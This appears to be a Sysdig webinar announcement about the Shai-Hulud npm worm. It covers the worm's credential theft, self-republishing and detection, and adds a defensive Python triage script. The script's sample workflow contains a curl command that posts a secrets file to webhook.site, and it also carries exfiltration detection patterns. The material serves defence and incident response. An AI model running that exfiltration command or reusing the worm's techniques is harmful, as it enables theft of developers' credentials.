Shai-Hulud: The self-replicating NPM worm
How it works, why it matters, and how to defend

In September 2025, researchers observed a supply-chain campaign in the NPM ecosystem that used self-replicating malware to spread across maintainers’ packages. Once its postinstall hook runs, the worm performs local discovery, hunts for GitHub, NPM, and cloud credentials, drops a malicious GitHub Action to exfiltrate the stolen secrets (often via webhook[.]site), and republishes infected versions of every package owned by the compromised maintainer, which accelerates propagation to hundreds of packages.
What you’ll take away:
- How Shai-Hulud works — post-install execution (bundle.js), local discovery, credential theft, GitHub Action persistence, and automated NPM republishing.
- Why it’s a big deal — novel self-propagation within the NPM ecosystem; rapid spread to ~200 packages in the first 24 hours.
- How to detect it — runtime signals (e.g., suspicious bundle.js activity, trufflehog execution, outbound calls during install, unusual public repo creation) and detections available in Sysdig Secure and Falco.
- What to do now — inventory checks for affected packages, version pinning/rollback, credential rotation, blocking npm where needed, and GitHub hygiene.
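As an added example (not code from the webinar, from Sysdig, or from the worm itself), the following Python script implements the inventory and GitHub-hygiene checks the last bullet calls for, keyed to the behaviours described above: it compares the package/version pairs in package-lock.json against a list of known-compromised versions, flags packages whose npm install hooks run a bundle.js, and searches GitHub workflow files for webhook.site. The IOC list, the `@acme/compromised-demo` package, and the sample lockfile and workflow are constructed placeholders; substitute the current advisory list of affected packages and versions before running it against a real repository.

```python
"""Offline triage helpers for a Shai-Hulud-style npm compromise (added example, not Sysdig code)."""
import json
import re
import sys
from pathlib import Path

# Constructed placeholder IOC list (package -> compromised versions); not a real advisory list.
SAMPLE_IOCS = {"@acme/compromised-demo": {"4.1.1", "4.1.2"}}

# npm runs these lifecycle hooks automatically at install time, in this order.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
BUNDLE_RE = re.compile(r"\bbundle\.js\b")
EXFIL_RE = re.compile(r"webhook\.site", re.IGNORECASE)


def lock_entries(lock):
    """Yield unique (name, version) pairs from a parsed package-lock.json (v1, v2 and v3 shapes)."""
    seen = set()
    # v2/v3: "packages" is keyed by the node_modules path; "" is the root project itself.
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue
        name = path.rsplit("node_modules/", 1)[-1]  # keeps the scope, e.g. @scope/name
        pair = (name, meta.get("version"))
        if pair[1] and pair not in seen:
            seen.add(pair)
            yield pair

    # v1: nested "dependencies" trees.
    def walk(deps):
        for name, meta in deps.items():
            pair = (name, meta.get("version"))
            if pair[1] and pair not in seen:
                seen.add(pair)
                yield pair
            yield from walk(meta.get("dependencies", {}))

    yield from walk(lock.get("dependencies", {}))


def find_compromised(lock, iocs):
    """Return sorted (name, version) pairs present both in the lockfile and in the IOC list."""
    return sorted((n, v) for n, v in lock_entries(lock) if v in iocs.get(n, ()))


def suspicious_install_hook(pkg):
    """Return (hook, command) if an install-time script runs a bundle.js, else None."""
    scripts = pkg.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook, "")
        if BUNDLE_RE.search(cmd):
            return hook, cmd
    return None


def exfil_indicators(workflow_text):
    """Return (line_number, line) for workflow lines that reference webhook.site."""
    return [(i, line.strip()) for i, line in enumerate(workflow_text.splitlines(), 1)
            if EXFIL_RE.search(line)]


def scan_project(root, iocs=SAMPLE_IOCS):
    """Run all three checks over a checked-out project directory and return the findings."""
    root = Path(root)
    findings = {"compromised_versions": [], "bundle_hooks": [], "exfil_workflows": []}
    lock_path = root / "package-lock.json"
    if lock_path.is_file():
        findings["compromised_versions"] = find_compromised(json.loads(lock_path.read_text()), iocs)
    for pkg_json in (root / "node_modules").glob("**/package.json"):
        try:
            hit = suspicious_install_hook(json.loads(pkg_json.read_text()))
        except (ValueError, OSError, AttributeError):
            continue  # unreadable or non-object package.json: skip, do not abort the scan
        if hit:
            findings["bundle_hooks"].append((str(pkg_json.parent.relative_to(root)), *hit))
    for wf in (root / ".github" / "workflows").glob("*.y*ml"):
        for lineno, line in exfil_indicators(wf.read_text(errors="replace")):
            findings["exfil_workflows"].append((wf.name, lineno, line))
    return findings


# Constructed sample inputs so the checks run without a real project.
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/harmless-lib": {"version": "2.0.0"},
        "node_modules/@acme/compromised-demo": {"version": "4.1.1"},
        "node_modules/harmless-lib/node_modules/@acme/compromised-demo": {"version": "4.1.1"},
    },
}
SAMPLE_PKG = {"name": "@acme/compromised-demo", "version": "4.1.1",
              "scripts": {"postinstall": "node bundle.js"}}
SAMPLE_WORKFLOW = """name: ci
on: push
jobs:
  build:
    steps:
      - run: curl -X POST https://webhook.site/example-id -d @secrets.json
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(json.dumps(scan_project(sys.argv[1]), indent=2))
    else:
        print(find_compromised(SAMPLE_LOCK, SAMPLE_IOCS), suspicious_install_hook(SAMPLE_PKG),
              exfil_indicators(SAMPLE_WORKFLOW), sep="\n")
```

Run it with a project path to scan a real checkout, or with no arguments to exercise the embedded samples. Two caveats: the lockfile check only sees what the lockfile records, so also inspect node_modules on any machine where an install actually ran; and a bundle.js install hook is a triage lead, not proof of compromise, since legitimate packages can ship a file by that name. Any hit should still be followed by the credential rotation and version rollback the bullet above describes.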
Speakers:
- Alberto Pellitteri — Sysdig Threat Research
- Michael Clark — Sysdig Threat Research
